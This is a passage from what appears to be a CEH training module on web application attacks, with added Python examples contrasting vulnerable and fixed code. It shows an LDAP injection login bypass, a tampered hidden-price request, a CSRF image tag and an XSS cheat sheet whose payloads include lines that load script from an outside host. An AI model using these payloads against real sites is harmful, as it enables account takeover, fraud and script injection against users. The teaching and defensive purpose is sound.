If an attacker enters the valid user name "juggyboy" and injects juggyboy)(&)), the filter string becomes (&(USER=juggyboy)(&))(PASS=blah)). Only the first complete filter, (&(USER=juggyboy)(&)), is processed by the LDAP server; the rest of the string is ignored. Because (&) is the LDAP "absolute true" filter, that query is satisfied for the juggyboy entry regardless of the password, and the attacker logs into the system without a valid password.

Account Login form as submitted by the attacker:
    Username: juggyboy)(&))
    Password: blah
FIGURE 13.13: Attack
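To make the "only the first filter is processed" behaviour concrete, here is an added example (not code from the module) with a toy LDAP filter parser and evaluator in Python, the login filter built by concatenation as in the attack above, and the same login with RFC 4515 value escaping. The in-memory directory entry, the (&(USER=...)(PASS=...)) filter shape and all names are constructed for illustration; a real application would bind to the directory with the supplied password rather than search for it:

```python
"""Added example, not from the CEH module: a toy LDAP filter parser/evaluator
used to show why the slide's juggyboy)(&)) payload bypasses the login, and the
RFC 4515 escaping that stops it. The in-memory directory, the login filter
shape (&(USER=...)(PASS=...)) and all names are constructed for illustration;
a real deployment would bind to the directory rather than compare passwords."""
import re

# Constructed directory entry. Attribute names are matched case-insensitively.
DIRECTORY = [{"user": "juggyboy", "pass": "s3cret"}]

_ESCAPES = {"\\": "\\5c", "*": "\\2a", "(": "\\28", ")": "\\29", "\x00": "\\00"}


def escape_filter_value(value: str) -> str:
    """RFC 4515 encoding of a value that goes inside an LDAP search filter."""
    return "".join(_ESCAPES.get(ch, ch) for ch in value)


def _unescape(value: str) -> str:
    return re.sub(r"\\([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), value)


def parse_filter(s: str, i: int = 0):
    """Parse one complete filter starting at s[i]; return (node, next index).
    Anything after the first complete filter is ignored, which is exactly the
    behaviour the injection relies on."""
    if s[i] != "(":
        raise ValueError("filter must start with '('")
    i += 1
    if s[i] in "&|":
        op, i, children = s[i], i + 1, []
        while s[i] == "(":
            child, i = parse_filter(s, i)
            children.append(child)
        if s[i] != ")":
            raise ValueError("unterminated filter")
        return (op, children), i + 1
    if s[i] == "!":
        child, i = parse_filter(s, i + 1)
        if s[i] != ")":
            raise ValueError("unterminated filter")
        return ("!", child), i + 1
    eq = s.index("=", i)
    close = s.index(")", eq)
    return ("=", s[i:eq], s[eq + 1:close]), close + 1


def matches(node, entry: dict) -> bool:
    kind = node[0]
    if kind == "&":   # all([]) is True: (&) is the absolute-true filter (RFC 4526)
        return all(matches(c, entry) for c in node[1])
    if kind == "|":
        return any(matches(c, entry) for c in node[1])
    if kind == "!":
        return not matches(node[1], entry)
    _, attr, value = node
    actual = entry.get(attr.lower())
    if actual is None:
        return False
    return value == "*" or actual == _unescape(value)


def search(filter_text: str) -> list:
    node, _ = parse_filter(filter_text)
    return [e for e in DIRECTORY if matches(node, e)]


def login_vulnerable(user: str, password: str) -> bool:
    """Filter built by concatenation, as in the slide."""
    return bool(search(f"(&(USER={user})(PASS={password}))"))


def login_safe(user: str, password: str) -> bool:
    """Same filter, but every user-controlled value is escaped first."""
    flt = f"(&(USER={escape_filter_value(user)})(PASS={escape_filter_value(password)}))"
    return bool(search(flt))


if __name__ == "__main__":
    print(login_vulnerable("juggyboy)(&))", "blah"), login_safe("juggyboy)(&))", "blah"))
```

Escaping turns the injected parentheses into \29 and \28, so the server sees one literal (and non-matching) user name instead of a second filter; the same escaping also neutralises the "*" wildcard, which would otherwise match any user and any password.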
Hidden Field Manipulation Attack

HTML code:

    <form method="post" action="page.aspx">
      <input type="hidden" name="PRICE" value="200.00">
      Product name: <input type="text" name="product" value="Juggyboy Shirt"><br>
      Product price: 200.00<br>
      <input type="submit" value="submit">
    </form>

Normal request:
    http://www.juggyboy.com/page.aspx?product=Juggyboy%20Shirt&price=200.00

Attack request (hidden PRICE field changed by the attacker):
    http://www.juggyboy.com/page.aspx?product=Juggyboy%20Shirt&price=2.00
Hidden Field Manipulation Attack
Hidden field manipulation attacks are mostly used against e-commerce websites today, and many online stores face this problem. In every client session, developers use hidden fields to store client information, including the price of the product (including discount rates). Developers assume that whatever they put in a hidden field comes back unchanged, but the field is part of the page the client controls: an attacker edits the price in the form, or in the request itself, and completes the transaction at the altered price rather than the actual price of the product.
FIGURE 13.14: Hidden Field Manipulation Attack
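An added example (not code from the module) of the PRICE hidden field above being trusted by the server, beside the two usual fixes: take the price from a server-side catalogue and ignore the client's copy, or, for state that really must round-trip through the browser, seal the hidden field with an HMAC so that tampering is detected. The catalogue, the server key and the form dictionaries are constructed for illustration:

```python
"""Added example, not from the CEH module: the slide's PRICE hidden field
trusted by the server, beside two fixes: look the price up server side, or
seal the hidden field with an HMAC so tampering is detected. The catalogue,
secret key and form dictionaries are constructed for illustration."""
import hashlib
import hmac
from decimal import Decimal

CATALOGUE = {"Juggyboy Shirt": Decimal("200.00")}
# Constructed server secret; in practice load it from configuration, never the page.
SERVER_KEY = b"constructed-demo-key-rotate-me"


def checkout_vulnerable(form: dict) -> Decimal:
    """Charges whatever price the browser sent back (the attack request's 2.00)."""
    return Decimal(form["price"]) * int(form.get("qty", 1))


def checkout_safe(form: dict) -> Decimal:
    """Ignores any client-supplied price; only the product name is input."""
    product = form["product"]
    if product not in CATALOGUE:
        raise ValueError(f"unknown product: {product!r}")
    return CATALOGUE[product] * int(form.get("qty", 1))


def seal(fields: dict) -> str:
    """For state that genuinely must round-trip through the client: sign it.
    Returns 'k=v&k=v|hexmac' with keys in a canonical order."""
    body = "&".join(f"{k}={fields[k]}" for k in sorted(fields))
    mac = hmac.new(SERVER_KEY, body.encode(), hashlib.sha256).hexdigest()
    return f"{body}|{mac}"


def unseal(token: str) -> dict:
    """Verifies the MAC with a constant-time compare before trusting any field."""
    body, _, mac = token.rpartition("|")
    expected = hmac.new(SERVER_KEY, body.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(mac, expected):
        raise ValueError("hidden field tampered with")
    return dict(kv.split("=", 1) for kv in body.split("&"))


def checkout_sealed(form: dict) -> Decimal:
    """Price travels in the form, but only inside a sealed token."""
    state = unseal(form["state"])
    return Decimal(state["price"]) * int(form.get("qty", 1))


def demo() -> dict:
    normal = {"product": "Juggyboy Shirt", "price": "200.00"}
    attack = {"product": "Juggyboy Shirt", "price": "2.00"}
    sealed = seal({"product": "Juggyboy Shirt", "price": "200.00"})
    tampered = sealed.replace("price=200.00", "price=2.00")   # attacker edits the field
    out = {
        "vulnerable_normal": checkout_vulnerable(normal),
        "vulnerable_attack": checkout_vulnerable(attack),
        "safe_attack": checkout_safe(attack),
        "sealed_ok": checkout_sealed({"state": sealed}),
    }
    try:
        checkout_sealed({"state": tampered})
        out["sealed_tampered"] = "accepted"
    except ValueError:
        out["sealed_tampered"] = "rejected"
    return out


if __name__ == "__main__":
    print(demo())
```

The server-side lookup is the simpler and better answer whenever the server already knows the value; the sealed-field variant exists for multi-step flows where the server is stateless between requests.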
Cross-Site Scripting (XSS) Attacks
- It occurs when unvalidated input data is included in dynamic content that is sent to a user's web browser for rendering

Cross-Site Scripting (XSS) Attacks
Cross-site scripting is also called XSS. The vulnerability occurs when unvalidated input data is included in dynamic content that is sent to a user's web browser for rendering, so an attacker can use the web application to deliver malicious code, usually JavaScript, to other end users. When a web application reflects or stores input from one user, an attacker can commence an attack using that input, which can propagate to other users as well. Attackers inject malicious JavaScript, VBScript, ActiveX, HTML, or Flash for execution on a victim's system by hiding it within legitimate requests. The end user trusts the web application, and the attacker exploits that trust in order to do things that would not be allowed under normal conditions. An attacker often encodes the malicious portion of the tag (for example, in Unicode) so that the request seems genuine to the user.
How XSS Attacks Work
This example uses a vulnerable page which handles requests for nonexistent pages, a classic 404 error page.

Normal request:
    http://juggyboy.com/jason_file.html

Server code (handles requests for a nonexistent page, a classic 404 error page):

    <html>
    <body>
    <?php
    print "Not found: " . urldecode($_SERVER["REQUEST_URI"]);
    ?>
    </body>
    </html>

Server response:
    Not found: /jason_file.html

Because the requested path is echoed into the page unencoded, a URL whose path contains script runs that script in the browser of whoever follows it. The attack in the figure proceeds as follows:
1. The attacker sends an email with a malicious link ("Hi, you have won a lottery of $2M, click the link to claim it." with <A HREF=http://juggyboy.com/...>).
2. The user clicks the malicious link.
3. The server sends a page to the user with the client profile (Name: Shaun, Age: 31, Location: UK, Occupation: SE, Last visit: Sept 21, 2010).
4. The malicious code is executed in the client web browser.

In this example, the attacker crafts an email message with a malicious script and sends it to the victim:
    <A HREF=http://legitimateSite.com/registration.cgi?clientprofile=<SCRIPT>malicious code</SCRIPT>>Click here</A>

In a cross-site scripting attack via email, the attacker crafts an email that contains a link to the malicious script and sends it to the victim. When the victim clicks the link, the request is received by the legitimate server, which reflects the script back in its response. The following diagram depicts the cross-site scripting attack via email:
FIGURE 13.16: Attack via Email
XSS Example: Attack via Email
Participants: the user's browser, the legitimate server, the malicious script, and the attacker's server.
1. The attacker constructs a URL such as <A HREF=http://juggyboybank.com/...> carrying the malicious script, sends it to the user, and convinces the user to click on it.
2. The user's browser requests the page from the legitimate server.
3. The legitimate server returns the page with the malicious script embedded.
4. The browser runs the script.
FIGURE 13.17: Attack via Email

XSS Example: Stealing Users' Cookies
To steal the user's cookies with the help of an XSS attack, the attacker looks for XSS vulnerabilities and then installs a cookie stealer (cookie logger). The following are the various steps involved in stealing a user's cookies with the help of an XSS attack:
1. The user views the page hosted by the attacker (or a vulnerable page into which the attacker has injected script).
2. The HTML containing the malicious script is delivered to the user's browser.
3. The browser runs the script.
4. The script collects the user's cookies and sends them to the attacker's server.

XSS Example: Sending an Unauthorized Request
Using an XSS attack, the attacker can also send an unauthorized request. The following are the steps involved in an XSS attack intended to send an unauthorized request:
4. The attacker's server, in response to the user's request, sends the page with the malicious script; when the browser runs it, the script sends an unauthorized request on the user's behalf.
FIGURE 13.19: Sending an Unauthorized Request
XSS Attack in Blog Posting
The attacker adds a malicious script in the comment field of a blog post:

    <script>onload=window.location='http://www.juggyboy.com'</script>

The comment with the malicious script is stored on the server, and every user who loads the post is redirected to the malicious website juggyboy.com.

XSS Attack in Comment Field
The user visits the website (Tech Post: "Facebook acquires file-sharing service", a New York-based start-up that lets users privately and sporadically share files through a drag-and-drop interface with additional options). An existing comment reads "Jason, I love your blog post! - Mark (mark@miccasoft.com)". The attacker leaves the following comment:

    <script>alert("Hello World")</script>

The comment with the malicious script is stored on the server (Database Server, Web Application), and the alert pops up as soon as the web page is loaded (Popup Window).

XSS Attack in a Comment Field
Many Internet web programs use HTML pages that dynamically accept data from different sources. The data in the HTML pages can be dynamically changed according to the request. Attackers use the HTML web page's tags to manipulate the data and launch the attack by abusing the comments feature with a malicious script. When the target views the comment, the malicious script is executed in the target's browser, initiating malicious actions.
FIGURE 13.21: XSS Attack in a Comment Field
XSS Cheat Sheet
Normal XSS JavaScript injection:
    <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
Image XSS:
    <IMG SRC="javascript:alert('XSS');">
No quotes and no semicolon:
    <IMG SRC=javascript:alert('XSS')>
Case insensitive XSS attack vector:
    <IMG SRC=JaVaScRiPt:alert('XSS')>
Embedded tab:
    <IMG SRC="jav	ascript:alert('XSS');">
Embedded encoded tab:
    <IMG SRC="jav&#x09;ascript:alert('XSS');">
Embedded carriage return:
    <IMG SRC="jav&#x0D;ascript:alert('XSS');">
Null chars:
    perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
Non-alpha-non-digit XSS:
    <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
Non-alpha-non-digit part 2 XSS:
    <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
Extraneous open brackets:
    <<SCRIPT>alert("XSS");//<</SCRIPT>
Double open angle brackets:
    <iframe src=http://ha.ckers.org/scriptlet.html <
XSS with no single quotes or double quotes or semicolons:
    <SCRIPT>a=/XSS/
    alert(a.source)</SCRIPT>
IMG lowsrc:
    <IMG LOWSRC="javascript:alert('XSS')">
IMG DYNSRC:
    <IMG DYNSRC="javascript:alert('XSS')">
BGSOUND:
    <BGSOUND SRC="javascript:alert('XSS');">
LAYER:
    <LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER>
Mocha:
    <IMG SRC="livescript:[code]">
US-ASCII encoding:
    ¼script¾alert(¢XSS¢)¼/script¾
XSS locator:
    '';!--"<XSS>=&{()}
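An added example (not code from the module) that ties the 404 page from "How XSS Attacks Work", the stored blog comment, and the cheat sheet together in Python: the same request URI rendered unescaped (the vulnerable PHP), through a naive "<script" blocklist of the kind written first, and through HTML output encoding. The request URIs and comment text are constructed, the vectors are taken from the cheat sheet above, and the small detector at the end is a demo aid rather than a production filter:

```python
"""Added example, not from the CEH module: the module's 404 page and blog
comment rendered three ways: unescaped (the vulnerable PHP), through a naive
'<script' blocklist, and through HTML output encoding. The request URIs and
comment text are constructed; the vectors come from the cheat sheet above,
and the detector below is a demo aid, not a production filter."""
import html
import re
from urllib.parse import unquote

# The blocklist people write first: remove <script ...> tags and nothing else.
_SCRIPT_TAG = re.compile(r"</?script[^>]*>", re.IGNORECASE)

# Demo detector: a script tag, a script: URL in a tag attribute, or an on*
# handler that survived into the output. Encoded output never contains a raw
# "<tag", so it never matches, which is the point.
_ACTIVE = re.compile(
    r"<script"
    r"|<\w+[^>]*\s(?:src|lowsrc|dynsrc|href)\s*=\s*[\"']?\s*(?:javascript|livescript):"
    r"|<\w+[^>]*\son\w+",
    re.IGNORECASE)

VECTORS = {  # a selection from the cheat sheet above
    "image": "<IMG SRC=\"javascript:alert('XSS');\">",
    "case_insensitive": "<IMG SRC=JaVaScRiPt:alert('XSS')>",
    "no_quotes": "<IMG SRC=javascript:alert('XSS')>",
    "body_onload": "<BODY onload!#$%&()*~+-_.,:;?@[/|\\]^`=alert(\"XSS\")>",
    "lowsrc": "<IMG LOWSRC=\"javascript:alert('XSS')\">",
    "bgsound": "<BGSOUND SRC=\"javascript:alert('XSS');\">",
    "mocha": "<IMG SRC=\"livescript:[code]\">",
    "script_src": "<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>",
}


def not_found_vulnerable(request_uri: str) -> str:
    """print "Not found: " . urldecode($_SERVER["REQUEST_URI"]), as on the slide."""
    return "<html><body>Not found: " + unquote(request_uri) + "</body></html>"


def not_found_blocklist(request_uri: str) -> str:
    """The same page behind the <script> blocklist."""
    return "<html><body>Not found: " + _SCRIPT_TAG.sub("", unquote(request_uri)) + "</body></html>"


def not_found_safe(request_uri: str) -> str:
    """Encode for the HTML text context: the payload becomes inert text."""
    return "<html><body>Not found: " + html.escape(unquote(request_uri)) + "</body></html>"


def render_comment_safe(author: str, text: str) -> str:
    """Stored XSS (the blog comment) has the same fix: encode at output time,
    whatever was stored."""
    return f"<p><b>{html.escape(author)}</b>: {html.escape(text)}</p>"


def contains_active_markup(page: str) -> bool:
    return bool(_ACTIVE.search(page))


def survivors(render) -> list:
    """Names of the vectors that come out of `render` still carrying active markup."""
    return sorted(name for name, vector in VECTORS.items()
                  if contains_active_markup(render("/" + vector)))


if __name__ == "__main__":
    for fn in (not_found_vulnerable, not_found_blocklist, not_found_safe):
        print(fn.__name__, survivors(fn))
    print(render_comment_safe("Mark", '<script>alert("Hello World")</script>'))
```

The blocklist removes exactly one of the eight vectors; the cheat sheet exists precisely because filters built that way never finish. Context-aware output encoding removes all of them, because the browser never sees a tag at all.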
Cross-Site Request Forgery (CSRF) Attack
Participants: User, Trusted Website, Malicious Website.
1. The user logs into the trusted website, which stores the session identifier for the session in a cookie in the web browser.
2. The user visits a malicious website.
3. The malicious website sends a request to the trusted website from the user's browser, using his session cookie.

Copyright © by EC-Council. All Rights Reserved. Reproduction is Strictly Prohibited.

FIGURE 13.23: Cross-site Request Forgery (CSRF) Attack
How CSRF Attacks Work
In a cross-site request forgery attack, the attacker waits for the user to log in to the trusted server and then tricks the user into visiting a page, or clicking a link, that makes the user's browser send a request to the trusted server. Because the browser automatically attaches the user's session cookie, the trusted server carries out that request with the user's privileges, as if the user had submitted it. The following diagram explains the step-by-step process of a CSRF attack:

1. The user logs into the trusted server using his credentials.
2. The attacker sends a phishing mail tricking the user into sending a request to a malicious site.
3. The user requests a page from the malicious server.
4. The response page contains malicious code:

    <img src="http://juggyboy.com/juggyshop.php?symbol=MSFT&shares=1000" />

5. The browser loads the "image", which sends the order request to the trusted server together with the user's session cookie.

The trusted server's order page (buy.php; listing truncated in the figure) starts a session and reads the order from the request without checking where the request came from. Because $_REQUEST merges GET and POST parameters, the GET issued by the <img> tag is accepted just like a submission of the POST form:

    <?php
    session_start();
    if (isset($_REQUEST['symbol']) && ...

    <form action="buy.php" method="POST">
      Symbol: ...
      Shares: ...

FIGURE 13.24: How CSRF Attacks Work
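An added example (not code from the module) of the buy.php handler above, which accepts any request carrying the session cookie, beside a version that only changes state on a POST that carries a synchroniser token bound to the session and, as defence in depth, rejects requests the browser labels as cross-site via the Sec-Fetch-Site header. The session store, the Request object, the order book and all names are constructed for illustration:

```python
"""Added example, not from the CEH module: the slide's buy.php handler, which
accepts any request that carries the session cookie, beside a version that
requires POST plus a synchroniser token bound to the session. The session
store, Request object, order book and names are constructed for illustration."""
import hmac
import secrets
from dataclasses import dataclass, field

SESSIONS = {}   # session id -> {"user": ..., "csrf": ...}
ORDERS = []     # (user, symbol, shares)


@dataclass
class Request:
    method: str
    cookies: dict
    params: dict = field(default_factory=dict)   # like $_REQUEST: GET or POST values
    sec_fetch_site: str = ""                     # Sec-Fetch-Site header, "" if the browser sent none


def login(user: str) -> str:
    """Creates a session and a per-session CSRF token, the one value the
    attacker's site can neither read nor guess."""
    sid = secrets.token_urlsafe(16)
    SESSIONS[sid] = {"user": user, "csrf": secrets.token_urlsafe(16)}
    return sid


def csrf_token_for(sid: str) -> str:
    """What the legitimate buy form embeds as a hidden field."""
    return SESSIONS[sid]["csrf"]


def buy_vulnerable(req: Request) -> str:
    """session_start(); if (isset($_REQUEST['symbol']) ...) buy_stocks(...).
    The GET issued for <img src=...juggyshop.php?symbol=MSFT&shares=1000>
    arrives with the victim's cookie and is indistinguishable from a real order."""
    sess = SESSIONS.get(req.cookies.get("PHPSESSID"))
    if sess is None:
        return "login required"
    if "symbol" in req.params and "shares" in req.params:
        ORDERS.append((sess["user"], req.params["symbol"], int(req.params["shares"])))
        return "order placed"
    return "form"


def buy_safe(req: Request) -> str:
    """State changes only via POST, only with the session's token, and (defence
    in depth) never for requests the browser labels as cross-site."""
    sess = SESSIONS.get(req.cookies.get("PHPSESSID"))
    if sess is None:
        return "login required"
    if req.method != "POST":
        return "form"
    if req.sec_fetch_site and req.sec_fetch_site not in ("same-origin", "none"):
        return "rejected: cross-site request"
    token = req.params.get("csrf", "")
    if not hmac.compare_digest(token.encode(), sess["csrf"].encode()):
        return "rejected: bad CSRF token"
    ORDERS.append((sess["user"], req.params["symbol"], int(req.params["shares"])))
    return "order placed"


def demo() -> dict:
    ORDERS.clear()
    sid = login("victim")
    cookie = {"PHPSESSID": sid}
    # Request the browser makes while rendering the attacker's <img> tag:
    img_get = Request("GET", cookie, {"symbol": "MSFT", "shares": "1000"}, "cross-site")
    # Attacker's page auto-submitting a hidden form instead:
    forged_post = Request("POST", cookie, {"symbol": "MSFT", "shares": "1000"}, "cross-site")
    # Same, from a browser that sends no Sec-Fetch-Site header:
    forged_post_old = Request("POST", cookie, {"symbol": "MSFT", "shares": "1000"})
    # The real form, carrying the token the page embedded for this session:
    genuine = Request("POST", cookie,
                      {"symbol": "MSFT", "shares": "10", "csrf": csrf_token_for(sid)})
    return {
        "img_vulnerable": buy_vulnerable(img_get),
        "img_safe": buy_safe(img_get),
        "forged_post_safe": buy_safe(forged_post),
        "forged_post_old_safe": buy_safe(forged_post_old),
        "genuine_safe": buy_safe(genuine),
        "orders": list(ORDERS),
    }


if __name__ == "__main__":
    print(demo())
```

The token check is what actually stops the attack: the attacker's page can make the victim's browser send cookies, but it cannot read the token out of a page from another origin. Marking the session cookie SameSite=Lax or Strict would keep the cookie off the forged requests in the first place, which is a further layer.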
Web Application Denial-of-Service (DoS) Attack
Targets:
- CPU, memory, and sockets
- Disk bandwidth
- Database bandwidth
- Worker processes

Application-level DoS attacks emulate the same request syntax and network-level traffic characteristics as legitimate clients, which makes them very hard for existing DoS protection measures to distinguish from legitimate traffic.

The following issues make web applications vulnerable:
- Reasonable use of expectations
- Application environment bottlenecks
- Implementation flaws
- Poor data validation

Some of the common ways to perform a web application DoS attack are:
- Bandwidth consumption: flooding a network with data
- Resource starvation: depleting a system's resources
- Routing and DNS attacks: manipulating DNS tables to point to alternate IP addresses
Denial-of-Service (DoS) Examples
Most web applications are designed to serve, or withstand, a limited number of requests. If the limit is exceeded, the web application may fail to serve the additional requests. Attackers take advantage of this to launch denial-of-service attacks on web applications: they send requests to the web application until its resources are exhausted. Once the web application has received enough requests, it stops responding to other requests even though they are sent by authorized users, because the attacker has flooded the web application with false requests. Various web application DoS attacks include:

Note: For complete coverage of buffer overflow concepts and techniques, refer to Module 18: Buffer Overflow
Arbitrary Code
Both the web application and the server products that provide the static or dynamic features of the site or of the web application contain the potential for a buffer overflow error. Buffer overflow potential found in server products is commonly known and creates a threat to the users of that product. When web applications use such libraries, they become vulnerable to a possible buffer overflow attack.

Custom web application code, through which a web application's input is passed, may also contain buffer overflow potential. Buffer overflow errors in a custom web application are not easily detected, and fewer attackers find and develop such errors. If one is found in the custom application, the ability to use the error for anything other than crashing the application is reduced by the fact that neither the source code nor the error messages are accessible to the attacker.

Vulnerable Code (fragment):

    char *dest_buffer;
    if (NULL == dest_buffer)
        return -1;
    if (argc > 1) {
        return 0; }

Note: For complete coverage of buffer overflow concepts and techniques, refer to Module 17: Buffer Overflow Attacks.
Cookie/Session Poisoning
Cookies are used to maintain session state in the otherwise stateless HTTP protocol.
- Cookie poisoning attacks involve the modification of the contents of a cookie (personal information stored in a web user's computer) in order to bypass security mechanisms
- Poisoning allows an attacker to inject malicious content, modify the user's online experience, and obtain unauthorized information
- A proxy can be used for rewriting the session data, displaying the cookie data, and/or specifying a new user ID or other session identifiers in the cookie

How Cookie Poisoning Works
Cookies are mainly used by web applications to simulate a stateful experience for the end user, and serve as an identifier for the server side of the web application components. This attack alters the value of a cookie on the client side before the request is sent to the server. A web server sets a cookie with a Set-Cookie header in any response, and the browser stores it on the user's computer; cookies are a standard way of recognizing users. Once a cookie has been set, the browser sends it with every subsequent request to that web server. To provide further functionality to the application, cookies can also be modified and read by JavaScript. Anything the server reads back from a cookie is therefore client-controlled and must be treated as untrusted input.

The following diagram explains the process of a cookie poisoning attack:
1. The user browses a web page.
2. The web server replies with the requested page and sets a cookie on the user's browser.
3. The attacker orders a product using a modified cookie.
FIGURE 13.25: How Cookie Poisoning Works
Session Fixation Attacks
- In a session fixation attack, the attacker tricks the user into accessing a genuine web server using an explicit session ID value
- The attacker then assumes the identity of the victim and exploits his credentials at the server

The session fixation attack procedure is explained with the help of the following diagram:
1. The attacker sends an email containing a link with a fixed session ID: http://juggybank.com/login.jsp?sessionid=4321
2. The user clicks on the link and is taken to the bank website.
3. The user logs in to the server using his credentials and the fixed session ID.
4. The attacker presents the same session ID to the server and is treated as the logged-in victim.
FIGURE 13.26: How Cookie Poisoning Works
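An added example (not code from the module) covering both attacks above: a cookie that carries application data the server trusts (the poisoning in Figure 13.25) beside a cookie that carries only an opaque session ID with the data held server side, and a login that rotates that ID, so the sessionid=4321 the attacker fixed in Figure 13.26 is worthless once the victim has logged in. The session store, the users and the IDs are constructed for illustration:

```python
"""Added example, not from the CEH module: a cookie that carries application
data the server trusts (the poisoning in Figure 13.25) beside a cookie that
carries only an opaque session ID with the data held server side, and a login
that rotates that ID so a pre-set sessionid=4321 (Figure 13.26) is useless
to the attacker afterwards. Store, users and IDs are constructed."""
import secrets


def parse_cookie(raw: str) -> dict:
    """Minimal Cookie: header parser, e.g. 'role=user; sessionid=abc'."""
    return dict(part.strip().split("=", 1) for part in raw.split(";") if "=" in part)


def admin_page_vulnerable(cookie_header: str) -> str:
    """Authorisation decided by a field the browser controls."""
    return "admin panel" if parse_cookie(cookie_header).get("role") == "admin" else "forbidden"


class SessionStore:
    """Server-side sessions: the cookie is a random handle, nothing more."""

    def __init__(self):
        self._data = {}

    def create(self, sid: str = None) -> str:
        """Creates an anonymous session. `sid` exists only so the demo can model a
        server that accepts a client-chosen ID, which is the fixation weakness."""
        sid = sid or secrets.token_urlsafe(16)
        self._data[sid] = {"user": None, "role": None}
        return sid

    def login_fixable(self, sid: str, user: str, role: str) -> str:
        """Keeps the pre-login ID: whoever knew it before now owns the account."""
        self._data[sid].update(user=user, role=role)
        return sid

    def login(self, sid: str, user: str, role: str) -> str:
        """Rotates the ID on privilege change: the old handle is discarded."""
        self._data.pop(sid, None)
        new_sid = secrets.token_urlsafe(16)
        self._data[new_sid] = {"user": user, "role": role}
        return new_sid

    def whoami(self, sid: str) -> str:
        sess = self._data.get(sid)
        return sess["user"] if sess and sess["user"] else "anonymous"

    def admin_page(self, cookie_header: str) -> str:
        """Role comes from the server-side record, never from the cookie text."""
        sess = self._data.get(parse_cookie(cookie_header).get("sessionid", ""))
        return "admin panel" if sess and sess["role"] == "admin" else "forbidden"


def demo_poisoning() -> dict:
    store = SessionStore()
    sid = store.login(store.create(), "addison", "user")
    poisoned = "role=admin; sessionid=" + sid   # attacker edited the role field
    return {"vulnerable": admin_page_vulnerable(poisoned),
            "server_side": store.admin_page(poisoned)}


def demo_fixation() -> dict:
    """Attacker mails http://juggybank.com/login.jsp?sessionid=4321; victim logs in."""
    fixed = "4321"
    weak = SessionStore()
    weak.create(fixed)
    weak.login_fixable(fixed, "victim", "user")
    strong = SessionStore()
    strong.create(fixed)
    strong.login(fixed, "victim", "user")
    return {"attacker_with_4321_fixable": weak.whoami(fixed),
            "attacker_with_4321_rotated": strong.whoami(fixed)}


if __name__ == "__main__":
    print(demo_poisoning())
    print(demo_fixation())
```

Both fixes follow from the same rule: the cookie identifies the session, the server holds the session's facts, and the identifier is replaced whenever the session's privilege changes.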
Insufficient Transport Layer Protection
- Insufficient transport layer protection supports weak algorithms, and uses expired or invalid certificates
- This vulnerability exposes users' data to untrusted third parties and can lead to account theft

Insufficient Transport Layer Protection
SSL/TLS should protect authentication on websites, or an attacker monitoring network traffic can steal an authenticated user's session cookie. Insufficient transport layer protection may allow untrusted third parties to obtain unauthorized access to sensitive information. The communication between the website and the client should be properly encrypted, or data can be intercepted, injected, or redirected. Account theft, phishing attacks, and compromise of admin accounts can follow once systems are compromised in this way.
J I m p r o p e r e r r o r h a n d l i n g g iv e s i n s i g h t i n t o s o u r c e c o d e s u c h a s lo g ic f l a w s ,
d e f a u lt a c c o u n ts , e tc .
U s in g t h e in f o r m a t i o n r e c e iv e d f r o m a n e r r o r m e s s a g e , a n a t t a c k e r
id e n t if ie s v u ln e r a b ilit ie s
Information Gathered: Out of memory, Null pointer exceptions, System call failure, Database unavailable, Network timeout, Database information, Web application logical flow, Application environment
[Figure: screenshot of a "General Error" page on http://juggyboy.com/ with DEBUG MODE enabled, exposing a MySQL error ("Can't open file: 'nuke_bbposts_text.MYO'. (errno: 145)"), the full SELECT statement over the nuke_bbposts, nuke_users and nuke_bbposts_text tables, the failing line number, and the script path /user/home/geeks/www/vonage/modules/Forums/viewtope.php]
Improper Error Handling
Improper error handling may result in various types of security issues for a website, especially when internal error messages such as stack traces, database dumps, and error codes are displayed to the attacker. An attacker can get various details related to the network, software versions, etc. Improper error handling gives insight into source code such as logic flaws, default accounts, etc. Using the information received from an error message, an attacker identifies vulnerabilities for launching attacks.
The information that can be gathered from error messages includes:
- Out of memory
- Null pointer exceptions
- System call failure
- Database unavailable
- Network timeout
- Database information
- Web application logical flow
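The following is an added example, not code from the module: the leaky handler returns the raw exception text to the client (the behaviour shown in the DEBUG MODE screenshot), while the hardened handler writes the details to the server log under a correlation id and returns only a generic message. The failing query and its error text are constructed to resemble the slide.

```python
import logging
import traceback
import uuid

log = logging.getLogger("app")


def leaky_handler(query_fn):
    """Anti-pattern: the raw exception text (SQL error, file path, stack trace)
    goes straight into the HTTP response body."""
    try:
        return 200, query_fn()
    except Exception:
        return 500, "General Error\n" + traceback.format_exc()


def safe_handler(query_fn):
    """Hardened: full diagnostics are logged server-side and keyed by a
    correlation id; the client only ever sees the id."""
    try:
        return 200, query_fn()
    except Exception:
        ref = uuid.uuid4().hex[:12]
        log.exception("request failed ref=%s", ref)
        return 500, f"An internal error occurred. Reference: {ref}"


def failing_query():
    # Constructed failure modelled on the slide's MySQL message.
    raise RuntimeError("Can't open file: 'nuke_bbposts_text.MYO'. (errno: 145)")


def leaks_internals(body: str) -> bool:
    """Crude response check: does the body reveal internals an attacker
    could use (stack trace markers, table files, errno values, paths)?"""
    markers = ("Traceback", ".MYO", "errno", ".py", "SELECT ")
    return any(m in body for m in markers)
```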
Insecure Cryptographic Storage
Insecure Cryptographic Storage
Insecure cryptographic storage describes the state of an application where poor encryption code is used for storing data in the database. Such insecurely stored data can be easily hacked and modified by the attacker to gain confidential and sensitive information such as credit card information, passwords, SSNs, and other authentication credentials that have not been protected with appropriate encryption or hashing, and then used to launch identity theft, credit card fraud, or other crimes. Developers can avoid such attacks by using proper algorithms to encrypt the sensitive data.
The following pictorial representation shows the vulnerable code that is poorly encrypted and secure code that is properly encrypted using a secure cryptographic algorithm.
FIGURE 13.27: Insecure Cryptographic Storage
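As an added illustration of the two sides of Figure 13.27 (this is not the module's code), the weak routine stores an unsalted single-round MD5 of the password, while the hardened routine uses a random per-user salt, PBKDF2-HMAC-SHA256 with a high iteration count, and a constant-time comparison. Function names and the record format are this example's own choices.

```python
import hashlib
import hmac
import os
from typing import Optional

# Vulnerable side: unsalted, single-round MD5. Equal passwords produce equal
# hashes (so leaks are linkable across users) and precomputed tables reverse
# common passwords instantly.
def store_password_weak(password: str) -> str:
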